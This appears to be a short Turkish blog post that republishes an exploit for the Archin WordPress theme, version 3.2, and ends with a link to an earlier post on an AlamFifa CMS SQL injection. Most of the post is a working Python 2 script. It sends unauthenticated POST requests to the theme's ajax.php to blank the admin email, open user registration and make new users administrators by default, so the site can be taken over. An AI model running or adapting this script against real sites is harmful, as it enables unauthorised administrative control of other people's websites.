Unauthenticated Configuration Access doğrulanmamış yapılandırma erişimi. Ayağıdaki açıkla sahte e-mail adresine bilgiler göndermek mümkün. Açığa ilişkin açıklamalar şu şekilde.
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib
#target site
site = "10.10.10.5"
#path to ajax.php
url = "/wordpress/wp-content/themes/archin/hades_framework/option_panel/ajax.php"
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, "admin_email", "")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
Bir önceki yazımız olan AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability başlıklı makalemizde AlamFifa CMS sql injection ve sql injection Alam Fifa CMS hakkında bilgiler verilmektedir.